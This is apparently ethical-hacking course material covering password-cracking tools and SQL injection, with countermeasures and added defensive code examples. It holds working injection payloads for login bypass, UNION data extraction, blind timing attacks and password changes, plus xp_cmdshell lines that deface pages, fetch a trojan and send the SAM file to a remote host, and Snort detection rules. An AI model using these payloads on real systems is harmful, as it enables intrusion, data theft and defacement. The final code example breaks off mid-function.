
© The query string is used to transfer data between client and server

Example:

http://www.mail.com/mail.asp?mailbox=sue&company=abc%20com

Sue's mailbox can be changed by changing the URL to:

http://www.mail.com/mail.asp?mailbox=joe&company=abc%20com

Cookies

© Cookies are a popular form of session management

© Cookies are often used to store important fields such as user names and account numbers

© All the fields can be easily modified using a program like CookieSpy

[Screenshot: Camtech's CT Cookie Spy v2.0 reporting "Number of Cookies Found: 113", with the origin host, date installed, date expires and cookie life of the selected cookie]

Dictionary Maker

[Screenshot: Dictionary Maker with a Unix dictionary loaded from C:\downloads\H-MDictionaries.zip; panels for the dictionary charset, files to process, a "Case register" option and results (current file, total words, checked words, work speed, progress)]

Dictionary files can be downloaded from the Internet or can be generated manually

Password Crackers

© L0phtcrack

© John The Ripper

© Brutus

© Obiwan

© Authforce

© Hydra

© Cain And Abel

© WebCracker

© Munga Bunga

© PassList

© ReadCookies.html

© SnadBoy

© WinSSLMiM

© RAR

© Gammaprog

L0phtcrack

© LC4 is one of the most popular password crackers available

© LC4 recovers Windows user account passwords to access accounts whose passwords are lost or to streamline migration of users to other authentication systems

[Screenshot: @stake LC4 session listing Windows accounts with their LM hashes, with the "Auditing Options For This Session" dialog: Dictionary Crack (tests for passwords that are the same as words in the word file), Dictionary/Brute Hybrid Crack (characters to prepend/append, common letter substitutions; finds passwords such as "Dana99" or "monkeys1") and Brute Force Crack (character set, distributed; finds passwords such as "WeR3plt6s")]

John the Ripper

© John the Ripper is a password cracker for UNIX, DOS, WinNT, and Win95

© John can crack the following password ciphers:

• Standard and double-length DES-based

• BSDI's extended DES-based

• FreeBSD's MD5-based

• OpenBSD's Blowfish-based

© John the Ripper combines several cracking modes in one program, and is fully configurable

[Screenshot: John the Ripper command-line help ("Usage: john [flags] [passwd files]") listing its cracking-mode and wordlist options]

Brutus

© Brutus is an online or remote password cracker

© Brutus is used to recover valid access tokens (usually a user name and password) for a given target system

[Screenshot: Brutus AET2 (www.hoobie.net/brutus) configured for HTTP (Basic Auth) on port 80 with a single user ID and a brute-force character range; the status pane reports the number of passwords the range will generate, the attempts per second and the estimated time remaining]

Obiwan

© Obiwan is based on the simple challenge-response authentication mechanism

© This mechanism does not provide for intruder lockout or impose delay time for wrong passwords

© Obiwan uses wordlists and alternations of numeric or alphanumeric characters as possible passwords

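The lockout and delay that the mechanism above lacks, as an added example that is not part of the courseware: a per-account failure counter that doubles the delay after each wrong password and locks the account once a threshold is hit. The threshold, lockout length and the simulated attempt sequence are constructed for this example.

```python
"""Per-account failure throttling for an online login (added example)."""
from dataclasses import dataclass, field

MAX_FAILURES = 5        # failures before the account is locked (constructed policy)
LOCKOUT_SECONDS = 900   # how long the lock lasts
BASE_DELAY = 1.0        # delay imposed after the first failure, doubled each time


@dataclass
class AccountState:
    failures: int = 0
    locked_until: float = 0.0


@dataclass
class Throttle:
    accounts: dict = field(default_factory=dict)

    def check(self, user: str, now: float) -> tuple:
        """Return (allowed, delay_seconds) for an attempt on `user` at `now`.
        A real server would sleep for `delay_seconds` before answering."""
        st = self.accounts.setdefault(user, AccountState())
        if now < st.locked_until:
            return False, st.locked_until - now
        delay = BASE_DELAY * (2 ** (st.failures - 1)) if st.failures else 0.0
        return True, delay

    def record(self, user: str, success: bool, now: float) -> None:
        """Reset the counter on success; count failures and lock at the threshold."""
        st = self.accounts.setdefault(user, AccountState())
        if success:
            st.failures = 0
            return
        st.failures += 1
        if st.failures >= MAX_FAILURES:
            st.locked_until = now + LOCKOUT_SECONDS


def simulate(attempts) -> list:
    """attempts: list of (time, user, password_correct). Returns one outcome
    string per attempt: 'ok', 'locked' or 'fail(delay=<seconds>)'."""
    th = Throttle()
    outcomes = []
    for t, user, ok in attempts:
        allowed, delay = th.check(user, t)
        if not allowed:
            outcomes.append("locked")
            continue
        th.record(user, ok, t)
        outcomes.append("ok" if ok else f"fail(delay={delay:g})")
    return outcomes


# Constructed sequence: six rapid wrong guesses (a few ms apart, as an
# automated tool would send them), then the right password after the lockout.
ATTEMPTS = [(0.000, "admin", False), (0.002, "admin", False),
            (0.004, "admin", False), (0.006, "admin", False),
            (0.008, "admin", False), (0.010, "admin", False),
            (901.0, "admin", True)]

if __name__ == "__main__":
    for (t, user, _), outcome in zip(ATTEMPTS, simulate(ATTEMPTS)):
        print(f"t={t:>8.3f}s {user}: {outcome}")
```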
Authforce

© Authforce is an HTTP Basic Authentication brute forcer

© Using various methods, it attempts to brute force user name and password pairs for a site

© It is used to test both the security of a site and to prove the insecurity of HTTP Basic Authentication based on the fact that users usually do not choose good passwords

Hydra

© Supports several protocols like TELNET, FTP, HTTP, HTTPS, LDAP, SMB, SMBNT, MYSQL, REXEC, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, ICQ, Cisco auth, Cisco enable, Cisco AAA

© Through the parallelizing feature, this password cracker tool can be fast depending on the protocol

© This tool allows for rapid dictionary attacks and includes SSL support

Cain & Abel

© Cain & Abel is a password cracking tool for Microsoft operating systems

© It allows easy recovery of various kinds of passwords by sniffing the network, cracking encrypted passwords using dictionary, brute force and cryptanalysis attacks, etc.

© It contains a feature called APR (ARP Poison Routing) which enables sniffing on switched LANs by hijacking IP traffic of multiple hosts at the same time

RAR

© This program is intended to recover lost passwords for RAR/WinRAR archives of versions 2.xx and 3.xx

© The program cracks passwords by brute force method, wordlist, or dictionary method

© The program is able to save a current state

© Estimated time calculator allows the user to configure the program more carefully

[Screenshot: RAR Password Recovery v1.1 RC5 (Intelore) running a brute-force attack on example.rar: password length range, allowed character classes (digits, uppercase, lowercase, special symbols, all printable, custom set) and statistics (total and checked passwords, current length, average speed in psw/sec, elapsed and remaining time); the log reports "Detected RAR/WinRAR v2.x encryption"]

Gammaprog

© Gammaprog is a brute force password cracker for web-based email address.

© It supports POP3 cracking as well.

© It provides for piping support. If the wordlist name is stdin, the program will read from stdin rather than from a file.

© It consists of Wingate support for POP3 cracking.

Hacking Tool: WebCracker

© WebCracker is a simple tool that takes text lists of user names and passwords and uses them as dictionaries to implement Basic authentication password guessing

© It keys on the "HTTP 302 Object Moved" response to indicate successful guesses

© It will find all successful guesses given in a user name/password

Sample list file:

# You can enter user/pass combinations like this:
username:password
james:bond

# When the file is used as a username file, it will

# And of course if used as a password file, it will

# special thanks to shadowcasT for these:
asdf:zxcv
asdf:fdsa
qwerty:ytrewq
qwerty:asdf
zxcvb:bvcxz
zxcvb:asdf
qwerTy:7ycvb

Hacking Tool: Munga Bunga

[Screenshot: Munga Bunga's HTTP Brute Forcer v1.0.3 (The Hackology Network): user name to brute force, word list for passwords (pass.lst), number of threads, definition file for HTTP and server information (encite.def), start/resume options, and filters such as "Don't process passwords with spaces", minimum/maximum password length and "Process all passwords as lowercase"; Status: Inactive]

It's a brute forcer, which uses the HTTP protocol to establish its connections

Hacking Tool: PassList

PassList is another character-based password generator

[Screenshot: PASSLIST.TXT in Notepad listing "starwars" followed by each trailing character ("starwars!", "starwars#", "starwars$", ...), and the generator's prompts: fixed beginning "starwars", maximum number of random characters per password: 2, "Generating passwords ... Process ended"]

Hacking Tool: ReadCookies

Reads cookies stored on the computer. This tool can be used for stealing cookies or cookie hijacking.

[Screenshot: "EC-Council - Ethical Hacking Demonstration (Cookie Hijacking)" web page: "Choose site to read cookies from" (suggestions: https://login.passport.com/ and http://www.yahoo.com/), "Read cookies" and "Reset" buttons, a "Cookie:" output field; status: Waiting for input]

Hacking Tool: SnadBoy

http://www.snadboy.com

"Snadboy Revelation" turns back the asterisk in password fields to plain text passwords

[Screenshot: SnadBoy's Revelation: drag the "circled +" cursor over a field and the text under the cursor, including text hidden by asterisks, is shown in the "Text of Window Under 'Circled +' Cursor" box; a status light shows whether text is available (bright green = text available, bright red = no text available)]

Hacking Tool: WinSSLMiM

http://www.securiteinfo.com/outils/WinSSLMiM.shtml

© WinSSLMiM is an HTTPS man-in-the-middle attacking tool. It includes FakeCert, a tool to make fake certificates.

© It can be used to exploit the Certificate Chain vulnerability in Internet Explorer. The tool works under Windows 9x/2000.

© Usage:

- FakeCert: fc -h
- WinSSLMiM: wsm -h

"Mary Had A Little Lamb" Formula

Consider a sentence:

"Mary had a little lamb. The lamb had white fleece."

1. Consider the first letter of each word, i.e.: MHALLTLHWF

2. Every second letter of the abbreviation can be put in the lower case, i.e.: MhAlLtLhWf

3. Replace "A" with "@" and "L" with "!". Thus, a new alphanumeric password with more than eight characters will be formed.

4. New Password: Mh@l!t!hWf

Picture Source: http://www.gypcnme.com/ceramic%20arts%20Mary%20Had%20Lamb

Countermeasures

© Passwords chosen should have at least eight characters

© Passwords should have a combination of lowercase and capital letters; numbers; special characters; etc.

© Words which can be easily found in a dictionary should not be used as passwords

© Public information such as social security number, credit card number, ATM card number, etc. should not be used as passwords

© Personal information should never be used as passwords

© User names and passwords should be different

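The "Mary Had A Little Lamb" derivation carried out in code, followed by a checker for the countermeasures listed above (length, character classes, dictionary words, user name), as an added example that is not part of the courseware. The small dictionary and the sample user names are constructed; the character-class rule is applied as "at least three of the four classes", since the slide's own example password contains no digit.

```python
"""Passphrase-to-password formula and password-policy check (added example)."""
import re


def passphrase_to_password(sentence: str, substitutions=None) -> str:
    """Steps 1-3 of the slide: first letter of each word, every second letter
    lowercased, then character substitutions (default A->@ and L->!)."""
    subs = substitutions or {"A": "@", "L": "!"}
    initials = "".join(w[0].upper() for w in re.findall(r"[A-Za-z]+", sentence))
    mixed = "".join(c.lower() if i % 2 else c for i, c in enumerate(initials))
    return "".join(subs.get(c, c) for c in mixed)


# Constructed stand-in for a real dictionary file.
DICTIONARY = {"password", "monkey", "letmein", "starwars", "admin", "welcome"}

CLASS_PATTERNS = (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]")


def policy_violations(password: str, username: str, dictionary=DICTIONARY) -> list:
    """Return the countermeasures from the slide that `password` violates;
    an empty list means the password passes the policy."""
    problems = []
    if len(password) < 8:
        problems.append("shorter than eight characters")
    classes_present = sum(bool(re.search(p, password)) for p in CLASS_PATTERNS)
    if classes_present < 3:
        problems.append("needs a mix of lowercase, uppercase, digits and special characters")
    # Strip digits/symbols so that 'Password1' is still caught as a dictionary word.
    core = re.sub(r"[^a-z]", "", password.lower())
    if core in dictionary or password.lower() in dictionary:
        problems.append("dictionary word")
    if password.lower() == username.lower():
        problems.append("same as user name")
    return problems


if __name__ == "__main__":
    pw = passphrase_to_password("Mary had a little lamb. The lamb had white fleece.")
    print(pw, policy_violations(pw, "admin") or "passes policy")
    for candidate, user in (("Password1", "sue"), ("sue", "sue")):
        print(candidate, policy_violations(candidate, user))
```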
Countermeasures (contd.)

© Managers and administrators can enhance the security of their networks by setting strong password policies. Password requirements should be built into organizational security policies.

© Systems administrators should implement safeguards to ensure that people on their systems are using adequately strong passwords.

© When installing new systems, it should be made sure default passwords are changed immediately.

Countermeasures (contd.)

© The user can use the SRP protocol. SRP is a secure password-based authentication and key-exchange protocol. It solves the problem of authenticating clients to servers securely, where the user of the client software is required to memorize a small secret (like a password) and carries no other secret information.

Summary

© Authentication is the process of checking the identity of the person claiming to be the legitimate user

© HTTP, NTLM, Negotiate, Certificate-Based, Forms-based, and Microsoft Passport are the different types of authentication

© Password crackers use two primary methods to identify correct passwords: brute force and dictionary searches

© L0phtcrack, John The Ripper, Brutus, Obiwan, etc. are some of the more popular password cracking tools available today

© The best technique to prevent the cracking of passwords is to have passwords which are more than 8 characters and to incorporate upper and lowercase alphanumeric, as well as special characters, into them

Ethical Hacking

Module XIV: SQL Injection

Scenario

© When the university imposed new rules for its admission program, the students opposed in unison. Their demands went unheeded and the rules were to be enforced from the start of the new academic year

© Johnny, the students' representative, decided to strike back and voice their protest through the university website

1. What can be in Johnny's mind?

2. What can Johnny do to increase the reach of the protests?

Module Objective

© What is SQL injection?

© Steps to conduct SQL injection

© Using SQL injection techniques to gain access to a system

© SQL injection in Oracle

© SQL injection in MySql

© Attacking SQL servers

© SQL injection automated tools

© Prevention and countermeasures

Module Flow

What is SQL injection -> Steps to conduct SQL injection -> SQL injection techniques -> SQL injection in Oracle -> SQL injection in MySQL -> SQL injection automated tools

What is SQL Injection?

© It is a technique of injecting SQL commands to exploit non-validated input vulnerabilities in a web application database back end

© Programmers use sequential commands with user input, making it easier for attackers to inject commands

© Attackers can execute arbitrary SQL commands through the web application

Exploiting Web Applications

© Exploits web applications that use client-supplied SQL queries

© It enables an attacker to execute unauthorized SQL commands

© Takes advantage of unsafe queries in web applications and builds dynamic SQL queries

For example, when a user logs in to a web page using user name and password for validation using an SQL query, with SQL injection it is possible to send specially crafted user name and password fields that will poison the SQL query

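The login check described above, written once with string concatenation (the query that can be poisoned) and once with a parameterised query, run against an in-memory SQLite table; this is an added example, not code from the courseware. The table contents and the inputs are constructed; the `blah' or 1=1--` value is the probe the courseware itself uses in later slides.

```python
"""Concatenated vs. parameterised login query (added example, constructed data)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed user table with a single account."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('yuri', 'newboy5')")
    return con


def login_vulnerable(con: sqlite3.Connection, username: str, password: str) -> bool:
    """The user-supplied strings become part of the SQL text itself, so a
    quote in the input changes the structure of the statement."""
    sql = ("SELECT COUNT(*) FROM users WHERE username='" + username +
           "' AND password='" + password + "'")
    return con.execute(sql).fetchone()[0] > 0


def login_parameterised(con: sqlite3.Connection, username: str, password: str) -> bool:
    """Placeholders keep the input as data: the statement shape is fixed and
    quotes inside the values have no syntactic effect."""
    sql = "SELECT COUNT(*) FROM users WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchone()[0] > 0


def single_quote_breaks_query(con: sqlite3.Connection) -> bool:
    """The lone-quote probe: with concatenation the SQL becomes unbalanced
    and the database raises an error (the kind of message a verbose page
    would leak); with parameters the same input is just a failed login."""
    try:
        login_vulnerable(con, "'", "x")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("legitimate login:", login_parameterised(db, "yuri", "newboy5"))
    print("tautology vs concatenation:", login_vulnerable(db, "blah' or 1=1--", "x"))
    print("tautology vs parameters:", login_parameterised(db, "blah' or 1=1--", "x"))
    print("lone quote raises an error:", single_quote_breaks_query(db))
```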
SQL Injection Steps

© What do you need?

• Any web browser

[Screenshot: EC-Council member login page (http://eccouncil.org/Login.htm) with Username and Password fields, captioned "Example of a Login Page"]

Input validation attack occurs here on a website

What You Should Look For

© Try to look for pages that allow to submit data, for example login page, search page, feedback, etc.

© Look for HTML pages that use POST or GET command

© If POST is used you cannot see the parameters in the URL

© Check the source code of the HTML to get information

• For example, to check whether it is using POST or GET, check the <Form> tag in the source code

<Form action=search.asp method=post>
<input type=hidden name=X value=Z>
</Form>

What If It Doesn't Take Input?

© If input is not given, check for pages like ASP, JSP, CGI, or PHP

© Check the URL that takes parameters

• Example

- http://www.xsecurity.com/index.asp?id=10

• In the above example, attackers will attempt

- http://www.xsecurity.com/index.asp?id=blah' or 1=1--

OLE DB Errors

The user-filled fields are enclosed by single quotation marks ('). A simple test would be to try using (') as the user name

The following error message will be displayed when a (') is entered into a form that is vulnerable to SQL injection

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Extra ) in query expression 'Userid='3306') or ('a'='a' AND Password=''.

/_booking/login3.asp, line 49

If this error is displayed, then SQL injection techniques can be tried

Input Validation Attack

[Screenshot: EC-Council member login page (http://eccouncil.org/Login.htm) with Username and Password fields, captioned "Example of a Login Page"]

Input validation attack occurs here on a website

SQL Injection Techniques

© The following are SQL injection techniques

• Authorization bypass

- By bypassing logon forms

• Using the SELECT command

- Used to retrieve data from the database

• Using the INSERT command

- Used to add information to the database

• Using SQL server stored procedures

How to Test if it is Vulnerable?

© Use a single quote in the input:

blah' or 1=1--
Login: blah' or 1=1--
Password: blah' or 1=1--

http://search/index.asp?id=blah' or 1=1--

© Depending on the query, try the following possibilities:

' or 1=1--
" or 1=1--

' or 'a'='a
" or "a"="a

') or ('a'='a

Executing Operating System Commands - 1

© Use stored procedures like master..xp_cmdshell to perform remote execution

© Execute any OS commands here

• blah'; exec master..xp_cmdshell 'insert OS command here'--

© Ping a server

• blah'; exec master..xp_cmdshell 'ping 10.10.1.2'--

© Directory listing

• blah'; exec master..xp_cmdshell 'dir c:\*.* /s > c:\directory.txt'--

© Create a file

• blah'; exec master..xp_cmdshell 'echo juggyboy-was-here > c:\juggyboy.txt'--

Executing Operating System Commands - 2

© Defacing a web page (assuming write access allowed due to misconfiguration)

• blah'; exec master..xp_cmdshell 'echo you-are-defaced > c:\inetpub\wwwroot\index.htm'--

© Execute applications (only non-GUI app)

• blah'; exec master..xp_cmdshell 'cmd.exe /c appname.exe'--

© Upload a Trojan to the server

• blah'; exec master..xp_cmdshell 'tftp -i 10.0.0.4 GET trojan.exe c:\trojan.exe'--

© Download a file from the server

• blah'; exec master..xp_cmdshell 'tftp -i 10.0.0.4 put c:\winnt\repair\SAM SAM'--

Getting Output of SQL Query

© Use sp_makewebtask to write query into an HTML

• Example

blah'; EXEC master..sp_makewebtask '\\10.10.1.4\share\creditcard.html', 'SELECT * FROM CREDITCARD'

The above command exports the credit card table to the attacker's network share

Getting Data from the Database Using ODBC Error Message

© Using UNION keyword

• http://xsecurity.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

• To retrieve information from the above query use

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

© Using LIKE keyword

• http://xsecurity.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25LOGIN%25'--

How to Mine all Column Names of a Table?

© To map out all column names of a table, type

• http://xsecurity.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

© To get the next column name, use NOT IN()

• http://xsecurity.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' AND COLUMN_NAME NOT IN ('login_id')--

How to Retrieve any Data?

© To get the login_name from the "admin_login" table

• http://xsecurity.com/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

© From above, we get the login_name of the admin user.

© To get the password for login_name='yuri'

• http://xsecurity.com/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login WHERE login_name='yuri'--

How to Update/Insert Data into Database?

© After gathering all column names of a table, it is possible to UPDATE or INSERT records in the table

• Example to change password for 'yuri':

• http://xsecurity.com/index.asp?id=10; UPDATE 'admin_login' SET 'password'='newboy5' WHERE login_name='yuri'--

© To INSERT a record

• http://xsecurity.com/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (111, 'yuri2', 'newboy5', 'NA')--

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Absinthe Automated SQL Injection Tool

[Screenshot: the Absinthe GUI. Tabs: Host Information, DB Schema, Download Records. Exploit Type: Blind Injection or Error Based; Target Database (PostgreSQL selected); Target URL (a test page on internal.0x90.org); Connection Method: GET or POST, Use SSL, Comment End of Query, Append text to end of query; Authentication: Basic, Digest or NTLM with name and password; Form Parameters: name, default value, Injectable Parameter, Treat Value as String, Add Parameter / Add Cookie; a parameter list showing id = 2, Injectable = True; Initialize Injection button.]
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SQL Injection in Oracle

© SQL injection in Oracle can be performed as follows:

• UNIONs can be added to the existing statement to execute a second statement

• SUBSELECTs can be added to existing statements

• Data Definition Language (DDL) can be injected if DDL is used in a dynamic SQL string

• INSERTs, UPDATEs, and DELETEs can also be injected

• Anonymous PL/SQL blocks can be injected into procedures that build dynamic SQL
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SQL Injection in MySQL Database

© SQL injection is harder to exploit against MySQL than against SQL Server

© A MySQL-backed web application is just as vulnerable when it builds queries from unescaped input, but the injection is harder to turn into data

© It is difficult to trace the output: the page may show nothing of the injected query's result

© You may see an error because the value retrieved is passed to multiple queries with a different number of columns before the script ends

© In such situations, SELECT and UNION cannot be used to read data directly, and a blind technique such as the timing attack on the following slides is needed
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SQL Injection in MySQL Database

© Example: consider a database 'pizza' behind a forum reply page:

• http://www.xsecurity.com/pizza/index.php?a=post&s=reply&t=1'

• To show the tables, type the query:

mysql> SHOW TABLES;

• To see the current user:

mysql> SELECT USER();

• The following query shows the first byte of the admin's password hash:

mysql> SELECT SUBSTRING(user_password, 1, 1) FROM mb_users WHERE user_group = 1;

• The following query shows that byte as an ASCII number (the first byte is '5', so it returns 53):

mysql> SELECT ASCII('5');
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SQL Injection in MySQL Database

© Preparing the GET Request

• To inject SQL commands successfully we have to clean the request of any single quote, so the byte value is written as CHAR(53) instead of '5'

mysql> SELECT active_id FROM mb_active UNION
SELECT IF(SUBSTRING(user_password, 1, 1) = CHAR(53),
BENCHMARK(1000000, MD5(CHAR(1))), null) FROM
mb_users WHERE user_group = 1;

© Exploiting the Vulnerability

• First, log in as a registered user with the rights to reply in the current thread

http://127.0.0.1/pizza/index.php?a=post&s=reply&t=1
UNION SELECT IF(SUBSTRING(user_password, 1, 1) =
CHAR(53), BENCHMARK(1000000, MD5(CHAR(1))), null),
null, null, null, null FROM mb_users WHERE
user_group = 1/*

• The four trailing nulls pad the UNION to the column count of the original query, and /* comments out the rest of it

• You will see a slowdown of a couple of seconds because the first byte is CHAR(53), '5'; if the guess is wrong the page returns at normal speed. Repeating this for every byte position and every candidate value recovers the whole hash without ever seeing query output
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Attack Against SQL Servers

© Techniques Involved

• Understand SQL Server and extract necessary information from the SQL Server Resolution Service

• List servers by osql -L probes

• sc.exe sweeping of services

• Port scanning

• Use of commercial alternatives
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SQL Server Resolution Service (SSRS)

© This service, listening on UDP port 1434, is responsible for sending a response packet containing connection details to clients who send a specially formed request

© The packet contains the details necessary to connect to the desired instance, including the TCP port for each instance

© The SSRS has had buffer overflow vulnerabilities that allow remote attackers to overwrite portions of system memory and execute arbitrary code
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osql -L Probing

© osql is a command-line utility provided by Microsoft with SQL Server 2000 that allows the user to issue queries to the server

© osql.exe includes a discovery switch (-L) that will poll the network looking for other installations of SQL Server

© osql.exe returns a list of server names and instances but no details about TCP ports or netlibs
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SQL Injection Automated Tools

© SQLDict

© SqlExec

© SQLbf

© SQLSmack

© SQL2.exe

© AppDetective

© Database Scanner

© SQLPoke

© NGSSQLCrack

© NGSSQuirreL

© SQLPing v2.2
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Hacking Tool: SQLDict

http://ntsecurity.nu/cgi-bin/download/sqldict.exe.pl

© SQLdict is a dictionary attack tool for SQL Server

© It tests if the accounts are strong enough to resist an attack

[Screenshot: SQLdict 2.1 - The SQL Server Dictionary Attacker, copyright (c) 2000 Arne Vidstrom, arne.vidstrom@ntsecurity.nu, http://ntsecurity.nu. Fields: Target server IP, Target account; buttons: Load Password File, Start, Stop, Exit.]
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Hacking Tool: SQLExec

© http://phoenix.liu.edu/~mdevi/util/Intro.htm

© This tool executes commands on compromised Microsoft SQL Servers using the xp_cmdshell stored procedure

© It uses the default sa account with a NULL password

© USAGE: SQLExec www.target.com

[Screenshot: C:\WINDOWS\System32\cmd.exe]

C:\Documents and Settings\Owner\My Documents\Ethical Hacking Lab Files v2\Module 14 - SQL Injection\sqlexec>sqlexec

SQLExec 1.0 for Windows NT/2K/9X
By Egemen Tas
Usage: SQLExec <Hostname>
***<Do not use ip addresses of targets>***

C:\Documents and Settings\Owner\My Documents\Ethical Hacking Lab Files v2\Module 14 - SQL Injection\sqlexec>
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Hacking Tool: SQLbf

http://www.cqure.net/tools.jsp?id=10

© SQLbf is a SQL Server password auditing tool. It should be used to audit the strength of Microsoft SQL Server passwords offline. The tool can be used either in brute-force mode or in dictionary attack mode. The performance on a 1 GHz Pentium (256 MB) machine is around 750,000 guesses/sec.

© To be able to perform an audit one needs the password hashes that are stored in the sysxlogins table in the master database.

© The hashes are easy to retrieve, although one needs a privileged account to do so, like an sa account. The query to use would be:

select name, password from master..sysxlogins

© To perform a dictionary attack on the retrieved hashes:

sqlbf -u hashes.txt -d dictionary.dic -r out.rep
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Hacking Tool: SQLSmack

© SQLSmack is a Linux-based remote command execution tool for MS SQL

© When provided with a valid user name and password, the tool permits execution of commands on a remote MS SQL Server by piping them through the stored procedure master..xp_cmdshell
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Hacking Tool: SQL2.exe

© SQL2 is a UDP buffer overflow remote exploit hacking tool

[Screenshot: C:\WINDOWS\System32\cmd.exe]

C:\Documents and Settings\Owner\Desktop\Exploits\Exploits_1\Exploits>sql2

SQL Server UDP Buffer Overflow Remote Exploit
Modified from "Advanced Windows Shellcode"
Code by David Litchfield, davidl@ngssoftware.com
Modified by lion, fix a bug.
Welcome to HUC Website http://www.cnhonker.com

Usage:
  sql2 Target [<NCHost> <NCPort> <SQLSP>]
Example:
  Target is MSSQL SP 0:
  C:\>nc -l -p 53
  C:\>sql2 db.target.com 202.202.202.202 53 0
  Target is MSSQL SP 1 or 2:
  C:\>sql2 db.target.com 202.202.202.202

C:\Documents and Settings\Owner\Desktop\Exploits\Exploits_1\Exploits>
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SQL Injection Countermeasures

© Selection of Regular Expressions

• Regular expression for detection of SQL meta characters:

- /(\%27)|(\')|(\-\-)|(\%23)|(#)/ix

• The above regular expression would be added to a Snort rule as follows:

- alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL Injection - Paranoid"; flow:to_server,established; uricontent:".pl"; pcre:"/(\%27)|(\')|(\-\-)|(%23)|(#)/i"; classtype:Web-application-attack; sid:9099; rev:5;)

• Both the literal characters and their hex (URL-encoded) forms are matched, because the browser encodes some of them (the single quote is sent as %27) but not others

• This rule is "paranoid" by design: it fires on any apostrophe or double-dash, so ordinary input such as a name containing a quote will trigger it
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SQL Injection Countermeasures (cont.)

• Modified regular expression for detection of SQL meta characters

- /((\%3D)|(=))[^\n]*((\%27)|(\')|(\-\-)|(\%3B)|(;))/i

• This looks for an = (the start of a parameter value) followed somewhere by a quote, double-dash, or semicolon, which cuts down the false positives of the paranoid version

• Regular expression for a typical SQL injection attack

- /\w*((\%27)|(\'))((\%6F)|o|(\%4F))((\%72)|r|(\%52))/ix

\w* - zero or more alphanumeric or underscore characters

(\%27)|\' - the ubiquitous single-quote or its hex equivalent

((\%6F)|o|(\%4F))((\%72)|r|(\%52)) - the word 'or' with various combinations of its upper and lower case hex equivalents
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SQL Injection Countermeasures (cont.)

• Regular expression for detecting SQL injection using the UNION keyword

- /((\%27)|(\'))union/ix

(\%27)|(\') - the single-quote and its hex equivalent
union - the keyword union

- The same expression can be used for the SELECT, INSERT, UPDATE, DELETE, and DROP keywords

- Note that it requires a quote immediately before the keyword; a UNION injected into a numeric parameter (id=10 UNION SELECT ...) contains no quote and is not matched

• Regular expression for detecting SQL injection attacks on an MS SQL server

- /exec(\s|\+)+(s|x)p\w+/ix

exec - the keyword required to run the stored or extended procedure

(\s|\+)+ - one or more whitespace characters or their HTTP-encoded equivalents

(s|x)p - the letters 'sp' or 'xp' to identify stored or extended procedures, respectively

\w+ - one or more alphanumeric or underscore characters to complete the name of the procedure
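The five patterns above run over a handful of request URIs, as an added Python example that is not part of the original course material; the sample URIs are constructed for the demonstration, not real log data, and the rule names are assumptions. It shows what the paranoid rule flags, that the quote-based rules miss a numeric UNION injection with no quote, and that an ordinary apostrophe in a search term is reported as an attack.

```python
import re

# The five patterns from the slides in Python syntax. The /x (free-spacing)
# flag is dropped because none of them contains literal whitespace; /i is re.I.
RULES = [
    ("sql-meta",     re.compile(r"(%27)|(')|(--)|(%23)|(#)", re.I)),
    ("sql-meta-mod", re.compile(r"((%3D)|(=))[^\n]*((%27)|(')|(--)|(%3B)|(;))", re.I)),
    ("quote-or",     re.compile(r"\w*((%27)|('))((%6F)|o|(%4F))((%72)|r|(%52))", re.I)),
    ("quote-union",  re.compile(r"((%27)|('))union", re.I)),
    ("mssql-exec",   re.compile(r"exec(\s|\+)+(s|x)p\w+", re.I)),
]


def classify(uri):
    """Names of the rules that fire on one request URI, in rule order."""
    return [name for name, pattern in RULES if pattern.search(uri)]


# Constructed sample requests for the demonstration (not real log data)
SAMPLES = {
    "benign":      "/index.asp?id=10",
    "apostrophe":  "/search.asp?q=O'Reilly",
    "quote-or":    "/index.asp?id=1'or'1'='1",
    "union-num":   "/index.asp?id=10%20UNION%20SELECT%20TOP%201%20TABLE_NAME"
                   "%20FROM%20INFORMATION_SCHEMA.TABLES--",
    "union-quote": "/index.asp?id=1'union%20select%20password%20from%20admin_login--",
    "xp_cmdshell": "/index.asp?id=1;exec+xp_cmdshell+'dir'",
}


def report():
    """Rule hits per sample: the paranoid rules fire on O'Reilly, and the
    quote-based rules miss the numeric UNION injection entirely."""
    return {label: classify(uri) for label, uri in SAMPLES.items()}


if __name__ == "__main__":
    for label, hits in report().items():
        print("%-12s %s" % (label, hits or "no match"))
```

The numeric UNION request is caught only by the two meta-character rules, and only because of its trailing double-dash; without the comment marker it would pass all five patterns, which is why signature rules of this kind are a monitoring aid and not a substitute for fixing the query construction.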
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Preventive Measures

© Minimize privileges of the database connection

© Disable verbose error messages

© Protect the system account 'sa'

© Audit source code

• Escape single quotes

• Input validation

• Reject known bad input

• Input bound checking

• Use parameterized queries instead of building SQL from strings; escaping single quotes alone does nothing for numeric parameters, where the injections on the earlier slides (id=10 UNION SELECT ...) contain no quote at all
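The defensive side of the same lookup page, as an added Python example that is not from the original course: the slides' vulnerable concatenation beside an input-validated, parameterized version, and a least-privilege connection that cannot read admin_login even when the vulnerable code is used. SQLite's authorizer callback stands in for a GRANT/DENY on SQL Server; the schema, rows and function names are constructed for the demonstration.

```python
import sqlite3

UNION_PAYLOAD = "1 UNION SELECT login_name, password FROM admin_login --"


def build_db():
    """Constructed schema with the same layout as on the slides."""
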